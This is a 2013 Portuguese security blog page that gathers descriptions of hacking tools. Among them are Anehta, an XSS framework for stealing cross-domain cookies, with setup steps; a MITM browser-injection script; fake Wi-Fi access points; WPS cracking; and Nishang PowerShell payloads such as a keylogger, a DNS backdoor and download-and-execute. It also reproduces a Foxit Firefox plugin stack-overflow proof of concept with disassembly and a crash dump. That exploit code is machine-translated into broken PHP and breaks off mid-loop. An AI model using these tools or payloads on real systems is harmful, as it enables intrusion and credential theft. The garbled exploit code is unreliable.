domingo, janeiro 20, 2013

Modelo de relatório sobre Ensaio de Intrusão

Boa Tarde A todos!

- Muitas pessoas me perguntam sobre trabalhar com segurança da informação, que quer implementar IDS, IPS, redes de alta disponibilidade, Quais as vantagens e desvantagens de optar apenas por este Ramo.  Como qualquer outro o caminho é árduo a seguir, certificações e graduações  são preponderantes para se obter sucesso profissional e por que não pessoal ( PNL ) , como já citei em uma postagem anterior.

- Acompanho muito as postagens do Dragonjar, que tem uns 10 anos de experiencia no ramo, e não é apenas por posts "l33tmothafoker hacking oldschool " não, sim pelo que auxilia para comunidade. Achei importante compartilhar um material sobre Modelos de relatórios de analise de intrusão, sem delongas.


Server Shield - Hardening linux

  • Firewall Hardening
  • TCP Hardening
  • Data Leakage Protection
  • ICMP/Ping Flood Protection
  • Rootkit Protection
  • DoS Protection
  • Spoof Protection
  • Bogus TCP Protection
  • SYN Flood Protection
  • Requires
  • iptables ("yum install iptables")
git clone
cd server-shield;chmod +x sshield;mv sshield /etc/init.d
/etc/init.d/sshield start 

Download Server Shield v1.0.2

Junkie - The Network Sniffer

As the heart of SecurActive network performance monitoring application lies a real-time packet sniffer and analyzer. Modular enough to accomplish many different tasks, we believe this tool can be a helpful companion to the modern network administrator and analyst, and so we decided to offer it to the public under a liberal license so that the Open Source community can use it, play with it, and extend it with whatever feature is deemed appropriate.
Compared to previously available tools junkie lies in between tcpdump and wireshark. Unlike tcpdump, its purpose is to parse protocols of any depth; unlike wireshark, through, junkie is designed to analyze traffic in real-time and so cannot parse traffic as completely as wireshark does.
In addition, junkie's design encompasses extendability and speed:
  • plug-in system + high-level extension language that eases the development and combination of new functionalities;
  • threaded packet capture and analysis for handling of high bandwidth network;
  • modular architecture to ease the addition of any protocol layer;
  • based on libpcap for portability;
  • well tested on professional settings.
Junkie is still being maintained and extended by SecurActive dedicated team but we believe it can be further extended to fulfill many unforeseen purposes.


Protocol discovery

  • Automatically convert from bro/l7-filter/snort filters to junkie protocol discovery
  • When we found out a proto for TCP (that we know how to parse), register it both ways (using connection tracking hash?)

Netmatch language

  • a type for signed integers (in a way or another - maybe the few operators that really care should exist in two variants?);
  • another special form for converting a name to an ip_addr (or a regular function if we optimize constant away from runtime exec - see below about purity);
  • pure functions taking only constants (and thus returning a constant) should be precomputed;
  • a slice operator to extract a string from another string;
  • it should be correct to match with: (eth) ((ip) (...) or (arp) (...)). in other words, the proto list should be a special form (binding current protos) rather than a fixed preamble.
  • a list of every valid fields (with a docstrings) for better error messages;
  • a higher level language resembling wireshark's, with automatic insertion of set? predicates;

Nettrack language

  • A www plugin to display each netgraph state;
  • rehashable states (once the global hash will be refactored into an incrementaly resized hash)


A plugin to use the aforementioned FSM executable rules to build report to help classify traffic;


Using the above report facility, produce netflow statistics (and stream it).


  • writer www plugin must mergecap fractionned pcap files for download;
  • automatic resolution of inter-modules dependancies during init;

Parsers for:

Anehta V-0.6 - Web Application Security Audit Tool

Anehta é uma ferramenta Web Pedido de Auditoria de Segurança, escrito em PHP / JavaScript projetado para fazer cross site scripting e ataques de outros web mais fácil e automatizado.

Instalar e configurar:
1. Descompactar todos os arquivos de um diretório em seu servidor
2. Verifique se o seu diretório tem a permissão de gravação.
3. Modificar U $ $ como nome de usuário e senha em P como "servidor de classe / / auth_Class.php" arquivo.
Nome de usuário padrão é "admin" ea senha padrão é "123456".
4. Se você quiser enviar e-mails, modificar "servidor / mail.php" arquivo para o seu próprio servidor de email ou caixa de correio.

Início Rápido:
1. Faça login e voltar para a guia Configurar.
2. Introduzir o "anehtaurl" como o endereço onde seu anehta é.
Por exemplo: "".
3. Você também deve inserir o src bumerangue e alvo bumerangue.
src bumerangue é normalmente a mesma página onde você coloca seus feed.js é.

Por exemplo: src boomerang talvez: " = ".
alvo bumerangue deve ser a página onde você quer roubar o cookie de domínio cruzado.
Por exemplo: alvo boomerang talvez: " # '> <'".
Você pode modificar feed.js para cancelar o módulo xcookie se você não quiser usar bumerangue. Mas você deve sempre definir valores bumerangue src e alvo quando você modificar na guia de configuração.

4. Depois configure modificado, basta carregar feed.js como um script externo para onde sua página xss é. Há também uma página de demonstração no diretório que é "demo.html"
5. Atualizar a admin.php, e você pode ver algumas mudanças se o seu escravo xss vinda.

  anehta-v0.6.0.rar   4.6 MB
=== Enviroment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS

=== Install & Configure ===
1. Decompress all the files in a directory on your server
2. Make sure your directory has the write permission.
3. Modify $U as username and $P as password in "server/class/auth_Class.php" file.
   Default username is "admin" and default password is "123456".
4. If you want to send mail, modify "server/mail.php" file to your own mail server or mailbox.

=== Quick Start ===
1. Login and turn to the Configure tab.
2. Input the "anehtaurl" as the url where your anehta is.
   For example: "".
3. You should also input the boomerang src and boomerang target.
   boomerang src is usually the same page where you put your feed.js is.
   For example: boomerang src maybe: "".

   boomerang target must be the page where you want to steal cross domain cookie.
   For example: boomerang target maybe: "'><'".

   You can modify feed.js to cancel the xcookie module if you do not want to use boomerang.
   But you must always set boomerang src and target values when you modify in the configure tab.

4. After modified configure, simply load feed.js as a external script to where your xss page is.
   There is also a demo page in the directory which is "demo.html"

5. Refresh the admin.php, and you may see some changes if your xss slave coming.

=== More Support ===
Home page:
Blog:  (Many Docs here)
Demo Video:


Feel free to tell me your advise.
SHA1 Checksum:623853b2d834e696b4c264c22ef877ecfa588fbb What's this?

Pentoo - Security Focused Livecd

Pentoo is a security-focused livecd based on Gentoo. It's basically a gentoo install with lots of customized tools, customized kernel, and much more. Here is a non-exhaustive list of the features currently included :
  • Kernel with lzma and aufs patches
  • Wifi stack 2.6.32_rc7
  • Module loading support ala slax
  • Changes saving on usb stick
  • Enlightenment DR17 WM
  • Cuda/OPENCL cracking support with development tools
  • System updates if you got it finally installed
Put simply, Pentoo is Gentoo with the pentoo overlay. This overlay is available in layman so all you have to do is layman -L and layman -a pentoo.

Bizploit - ERP Penetration Testing framework.

  • Onapsis Bizploit
  •   Bizploit is the first Opensource ERP Penetration Testing framework. Developed by the Onapsis Research Labs, Bizploit assists security professionals in the discovery, exploration, vulnerability assessment and exploitation phases of specialized ERP Penetration Tests.
    Currently, Bizploit is shipped with many plugins to assess the security of SAP business platforms. Plugins for other popular ERPs will be included in the short term.
  • Download Bizploit v1.50-rc1 for Windows
  • Download Bizploit v1.50-rc1 for Linux

browser-in-the-middle , I love IT! :D

browser-in-the-middle is a bashscript that uses ettercap, metasploit and the beEF framework to make attacks that injects code in pages users visited on the internet from the local network.
- uses ettercap to launch a man in the middle attack
- ettercap modifies traffic so evil javascript or iframes are added
- victim's browser will be redirect to the attackers webserver
- the webserver will be running the msf autopwn module or the beEF framework to launch browserexploits are other browser related attacks.

File:   1.9 KB
Not working bash script to test if I can upload files.
SHA1 Checksum:0fe79f78dd385433edb70279306fc4974b9f0c77 What's this?

browser-in-the-middle - Script

Browser-in-the-middle is a bashscript that uses ettercap, metasploit and the beEF framework to make attacks that injects code in pages users visited on the internet from the local network.
- uses ettercap to launch a man in the middle attack
- ettercap modifies traffic so evil javascript or iframes are added
- victim's browser will be redirect to the attackers webserver
- the webserver will be running the msf autopwn module or the beEF framework to launch browserexploits are other browser related attacks.

File:   1.9 KB
Not working bash script to test if I can upload files.
SHA1 Checksum:0fe79f78dd385433edb70279306fc4974b9f0c77 What's this?

Wifi - Honey - Criando Ap's falsa (:

Vou deixar a descrição original (: 

This is a script, attack can use to creates fake APs using all encryption and monitors with Airodump. It automate the setup process, it creates five monitor mode interfaces, four are used as APs and the fifth is used for airdump-ng. To make things easier, rather than having five windows all this is done in a screen session which allows you to switch between screens to see what is going on. All sessions are labelled so you know which is which.
Installing wifi honey
chmod a+x
./ fake_wpa_net

./ fake_wpa_net 1 waln1
Download Wifi Honey

WPSCRACKGUI - Graphical tool for cracking WPS Wireless Pin

changelog v1.2.1 :
* The Portuguese language was added.
* Was added the Kozumi Keygen.
* Was added the Edimax Keygen.
* Was added the Belkin Keygen.
* Was added the Nisuta Keygen.
* Update Database to: # 301 Pines, # 120 MAC Address.
* Fixed bugs in General.
Graphical interface to the network cracking WPS Reaver.
wps_crack_gui1features :
  • Graphic User Interface (GUI) WPS encryption cracking.
  • Advanced Attack with Generic Dictionary.
  • Advanced Dictionary Attack with Enhanced.
  • Updated Assisted Reaver-WPS.
  • Database with PINs.
  • Change MAC Address.
  • Supported in Gt and Gtk.
  • Scan networks.

Vulnerabilidade crítica no plugin de Foxit PDF para o Firefox

Por algum tempo eu uso o Foxit Reader PDF como padrão leitor, é leve, rápido e usa menos recursos do que o Adobe Reader. Além do malware é continuamente chicotadas Adobe por simples economia de guerra: a maioria dos usuários usá-lo e são mais propensos a se espalhar. Eu posso então? Embutirme no meu roupão, enquanto egged um incêndio chaminé e cantou o slogan " Eu me sinto seguroooo "? Longe disso ... 

A partir do Adobe Reader X é orientado para a área de segurança de segurança e correções aplicadas e aplicada devido a múltiplas vulnerabilidades descobertas por um exército de beta testersdispostos a abrir as portas para seus artefatos maliciosos. Então, talvez o Foxit Reader não é o inimigo público número um, mas isso não significa mais seguro. 

O consultor italiano Andrea Micalizzi, aka rgod , nos lembrou recentemente pela publicação de uma vulnerabilidade que afeta, sim, o plugin do Foxit PDF para o navegador . Ou seja, o erro não está presente no leitor de PDF em si, se não na biblioteca npFoxitReaderPlugin.dll que atua como um intermediário entre o navegador eo Foxit Reader. 

Especificamente, o código é vulnerável a um estouro de pilha no processamento de pedidos de ligações longa . A prova de conceito é claro: agora trabalha na versão mais recente do Firefox (18,0) e da última versão do Foxit Reader ( com o seu plugin (  
Vamos olhar para código l de rgod:

 <? php * /

Foxit Reader <= Plugin para Firefox overlong npFoxitReaderPlugin.dll 
Query String remoto Stack Buffer Overflow PoC rgod ---------------------------


Testado contra Microsoft Windows
Mozilla Firefox 17.0.1
Foxit Reader
Foxit Reader

Arquivo: npFoxitReaderPlugin.dll

Url produto:
Arquivo de instalação última versão: FoxitReader544.11281_enu_Setup.exe

Lançamento da linha de comando, em seguida, navegar com o Firefox porta 6666.
Você também pode testá-lo através do site: [A x 1024]

Arquivo deve ser existentes ou o servidor deve estar respondendo com
o cabeçalho Content-Type adequada.

código vulnerável, npFoxitReaderPlugin.dll:

, ------------------------------------------------- -----------------------------
    empurrar ebx
    empurrar esi
    empurrar edi
    mov edi, ebp
    ou ecx, FFFFFFFFh
    xor eax, eax
    xor ebx, ebx
    esi xor, esi
    não ecx
    dezembro ecx
    teste ecx, ecx
    jle L100016E4
    mov al, [esi + ebp]
    mov word ptr [esp 18 h], 0000h
    cmp al, 25h
    jz L10001661
    mov ecx, [esp Ch 1]
    mov [ebx + ecx], o
    jmp L100016CE
    mov al, [esi + ebp 01 h]
    cmp al, 30h
    jl L1000166D
    cmp al, 39h
    jle L1000167D
    cmp al, 41h
    jl L10001675
    cmp al, 46h
    jle L1000167D
    cmp al, 61H
    jl L100016C6
    cmp al, 66h
    jg L100016C6
    mov dl, [esi + ebp 01 h]
    esi inc
    esi inc
    leia ecx, [esp +10 h]
    mov [esp 18 h], dl
    empurrar ecx
    mov al, [esi + ebp]
    lea edx, [esp Ch 1]
    empurrar L100450D4
    empurrar edx
    mov [esp 25 h], o
    chamar SUB_L10006421
    mov eax, [esp Ch 1]
    leia ecx, [esp 24 h]
    empurrar eax
    empurrar L100450D0
    empurrar ecx
    chamar SUB_L100063CF
    mov eax, [esp 34 h]
    mov dl, [esp 30 h]
    adicionar esp, 00000018h
    mov [ebx + eax], dl
    jmp L100016CE
    mov ecx, [esp Ch 1]
    mov byte ptr [ebx + ecx], 25h
    inc ebx
    mov edi, ebp
    ou ecx, FFFFFFFFh
    xor eax, eax
    esi inc
    não ecx
    dezembro ecx
    cmp esi, ecx
    jl L1000164A
    mov edx, [esp Ch 1]
    edi pop
    esi pop
    mov eax, 00000001H
    mov byte ptr [ebx + edx], 00h
    pop ebx
    pop ebp
    pop ecx
, ------------------------------------------------- -----------------------------

copiar este ciclo termina em substituição ponteiros de pilha, em seguida, 
(Ao ligar para plugin-container.exe):

(F48.1778): violação de acesso - código c0000005 (primeira chance)
Exceções de primeira chance são relatados antes de qualquer tratamento de exceção.
Essa exceção pode ser esperado e manipulados.
eax = 00000341 ebx = 0076ed4c 002cf414 edx = ecx = esi = 41414141 edi = 002cf414 0076e9e8
eip = 10016852 esp = 002cf3f8 ebp = iopl = 0 nv up ei pl 75eacdf8 nz nd po nc
cs = 001b ss = 0023 ds = 0023 es = 0023 fs = 003b gs = 0000 efl = 00010202
! npFoxitReaderPlugin NP_GetEntryPoints 0 x15672:
10016852 8906 mov dword ptr [esi], eax ds: 0023:41414141 =????
Tentativa de escrever para tratar 41414141

Também ponteiros SEH são substituídas
* /

error_reporting ( 0 );

set_time_limit ( 0 );

$ Porta =  6666 ;

____ $ Redirecionar =  "HTTP/1.1 301 Movido Permanentemente \ r \ n" . 
                "Servidor: Apache \ r \ n" . 
                "Localização:? / x.pdf" . str_repeat ( "A" , 1024 .) "\ r \ n " . 
                Content-Type ": text / html \ r \ n \ r \ n" ;

$ ____ Crescimento      =  "HTTP/1.1 200 OK \ r \ n" . 
                "Servidor: Apache \ r \ n" . 
                "Accept-Ranges: bytes \ r \ n" . 
                "Content-Length: 60137 \ r \ n" . 
                " ": Content-Type application / pdf \ r \ n . 
                "Connection: keep-alive \ r \ n \ r \ n" ;

$ Socket = stream_socket_server ( "tcp :/ /" . $ port , $ errno , $ errstr );

se  (! $ socket )  { 
  ECHO "$ errstr ($ errno) \ n" ; 
}  mais  { 
  ECHO "escutando na porta TCP público" . $ port . "\ n" ;   
  enquanto  ( $ conn = stream_socket_accept ( $ socket ))  { 
    $ linha = fgets ( $ conn ); 

Agora, execute o php (x.php no meu exemplo) a partir da linha de comando do nosso Windows 7: 

D : \ xampplite \ htdocs > d : \ xampplite \ php \ php . exe - fx . php
 Ouvir em público a porta TCP 6666 
/ 1,1
E, finalmente, visam corrigir o endereço e porta no navegador: 
Como você pode ver, temos causou o acidente do plugin com despeinarnos pouco ...  
Atualmente não há nenhuma atualização para resolvê-lo e outras versões do Foxit Reader e outros navegadores (Firefox, Chrome e Safari) podem ser vulneráveis, por isso é recomendável desabilitar o plugin até novo aviso: 

Para desativar arquivos PDF não será aberto diretamente no navegador e será carregado em um novo processo de Foxit Reader, evitando assim o uso do plugin DLL vulnerável. 

Fonte: vulnerabilidade reportada no Foxit PDF Plugin para o Firefox - como mitigá-la 
Atualização:  18 / 01/2012 : 


Java 0-DAY protection Firefox (:

Atualização - 18 de janeiro de 2013
Mozilla está estendendo clique para jogar para Java 7u11 devido a relatos de código de exploração disponível para 7u11 e informações que todos os elementos do bug Java original não foram totalmente abordados pela Oracle no patch 7u11.
Atualização - 13 de janeiro de 2013
A Oracle lançou uma atualização para corrigir essa vulnerabilidade. Leia mais aqui e baixar as atualizações aqui .
Mozilla está ciente de uma vulnerabilidade de segurança na versão atual do Java (Java 7 Update 10) que está sendo explorada ativamente e afeta qualquer navegador usando o plugin Java. Usuários do Firefox podem ser vulneráveis ​​a esse problema se eles têm o plug-in Java instalado no seu navegador. Informações sobre como verificar as extensões instaladas podem ser encontrados aqui .
Um invasor pode explorar essa vulnerabilidade para executar software malicioso na máquina da vítima. Esta vulnerabilidade está sendo ativamente usadas em ataques e do código de exploração maliciosa também está disponível em kits de exploração comuns.
Não há correção disponível no momento para este problema da Oracle.Para proteger os usuários do Firefox que permitiram Clique Para Jogar para versões recentes do Java em todas as plataformas (Java 7u9, 7u10, 6u37, 6u38). Os usuários do Firefox com versões antigas do Java já estão protegidos pelo plugin existente bloqueio ou Clique Para Jogar defesas.
O clique para jogar recurso garante que o plugin Java não irá carregar a menos que um usuário clica especificamente para permitir o plugin. Isso protege os usuários contra drive-by exploração, uma das técnicas de exploração mais comuns usadas para comprometer os usuários vulneráveis. Clique para jogar também permite aos usuários habilitar o plugin Java em uma base per-site se absolutamente necessário o plugin Java para o site.

Tela de demonstração do Clique Para Jogar
 Informações Adicionais
Nós incentivamos os usuários a sempre manter plugins atualizados. Visite o site de verificação do plugin  para atualizar plugins agora.
Informações para desativar completamente o plugin Java podem ser encontradas na página seguinte: para desligar applets Java
Michael Coates = Diretor de Segurança de Garantia firefox 

Controle de Certificados em IOS

Há muito tempo atrás poderia explicar como a análise de segurança de solicitações web que um aplicativo para iOS faz a instalação de uma CA no próprio telefone. Embora na maioria dos casos, o método irá trabalhar em outro tráfego não serão transmitidos como esperado, uma vez que a aplicação irá verificar que o certificado que você recebe é assinado por um de concreto CA, desconfiando de qualquer outro tipo de certificação da placa, inválido ou válido.

Para executar este controle (na fronteira com a segurança por obscuridade), é feito de duas maneiras: para definir exatamente o certificado a ser recebido, desenho a partir da equação para a CA ou limitar as assinaturas válidas para uma CA dado.

As funções que são usadas para trabalhar com SSL são três NSStream, CFStream, NSURLConnection, sendo este último o mais utilizado.

NSURLConnection métodos delegado usados ​​para obter vários valores e fazer verificação de parâmetros como canAuthenticateAgainstProtectionSpace didReceiveAuthenticationChallenge, ou willSendRequestForAuthenticationChallenge.

Por exemplo, o Twitter usa este método para impedir o homem no meio ataques, e pode-se sentir a dump "pinadas" o pedido de certificado.
Despejar classe-dump-z do aplicativo do Twitter.
Em tais casos, a estratégia tem de ser diferente. Usando um comportamento depurador e mudança, recompilar a aplicação ou hookear essas funções.

Com esse objetivo iSEC Partners criou IOS SSL Kill Switch , um pequeno puxão de MobileSubstrate que executa essa tarefa. Para usá-lo, é claro, requer que o telefone ser jailbroken.

A instalação é simples, instale o pacote correspondente deb e reiniciado o processo de MobileSubstrate.

Instalando Kill Switch IOS SSL

Uma vez instalado, você verá uma nova configuração nas configurações para ativar ou desativar.

Kill Switch Configurações de SSL


Powershell Windows Pentesting

Nishang é um quadro com uma coleção de scripts e cargas que lhe permite usar o PowerShell para executar vários ataques e pós-exploração tarefas durante um pentest. A versão atual 0.2.1 inclui os seguintes utilitários: 
  • Base64ToString.ps1: script que decodifica uma string em base64.
  • Wait_For_Command.ps1: pedidos Payload uma URL que à espera de instruções e baixar e executar um script powershell.
  • Browse_Accept_Applet.ps1: vela Payload silenciosamente aceita uma URL e um aviso de execução de um applet Java.
  • Credentials.ps1: Esta carga abre um prompt que solicita as credenciais do usuário e não fecha até que os dados são inseridos.
  • DNS_TXT_Pwnage.ps1: Carga que funciona como um backdoor e é capaz de receber comandos e scripts PowerShell através de solicitações de DNS TXT.
  • Download.ps1: Carga para baixar um arquivo no diretório temporário do usuário atual.
  • Download_Execute.ps1: Carga de baixar um formato de texto executável, convertê-lo de volta para o executável e executá-lo.
  • Ative-DuplicateToken.ps1: carga útil duas vezes o token LSASS acesso e coloca-lo no segmento do processo atual.
  • Comando-Execute-MSSQL.ps1: carga útil que pode ser usado para executar comandos remotamente em um servidor MS SQL.
  • ExetoText.ps1: Carga para converter um arquivo executável em um arquivo de texto.
  • Get-LSASecret.ps1: carga mostrando os segredos LSA do time da casa.
  • Information_Gather.ps1: Carga para obter informações úteis a partir do alvo e até pastebin como um post privado. A informação também é visível a partir do console.
  • Invoke-Medusa.ps1: carga executando um ataque de força bruta contra o SQL Server, Active Directory, Web e FTP.
  • Invoke-PingSweep.ps1: carga útil que examina endereços, portas e hosts.
  • Keylogger.ps1: Esta carga registra todas as teclas do usuário e grava-los para o arquivo no diretório temporário do usuário key.log (má idéia). A informação capturada é colado em pastebin também como um post privado.
  • Parse_Keys.ps1: script para analisar as informações obtidas pelo keylogger.
  • Speak.ps1: Payload que "fala" a frase que você especificar.
  • StringToBase64.ps1: script que codifica uma string para base64.
  • TexttoExe.ps1: Payload que converte um arquivo executável em PE hex.
  • Time_Execution.ps1: Carga esperando o momento certo para a execução de um script.
Todos esses scripts e cargas são compatíveis com Get-Help ou seja, usando o "Get-Help Completo "em um PowerShell pedir para obter os detalhes da ajuda de cada um deles. E lembre-se de permitir a execução de scripts PowerShell em um computador pode ser necessário alterar a política de execução: 

 PS D:\nishang_0.2.1> Set-ExecutionPolicy Unrestricted 
 Cambio de directiva de ejecución 
 La directiva de ejecución le ayuda a protegerse de scripts en los que no confía. Si cambia dicha directiva, podría 
 exponerse a los riesgos de seguridad descritos en el tema de la Ayuda about_Execution_Policies en . ¿Desea cambiar la directiva de ejecución? 
 [S] Sí [N] No [U] Suspender [?] Ayuda (el valor predeterminado es "S"): 
 PS D:\nishang_0.2.1>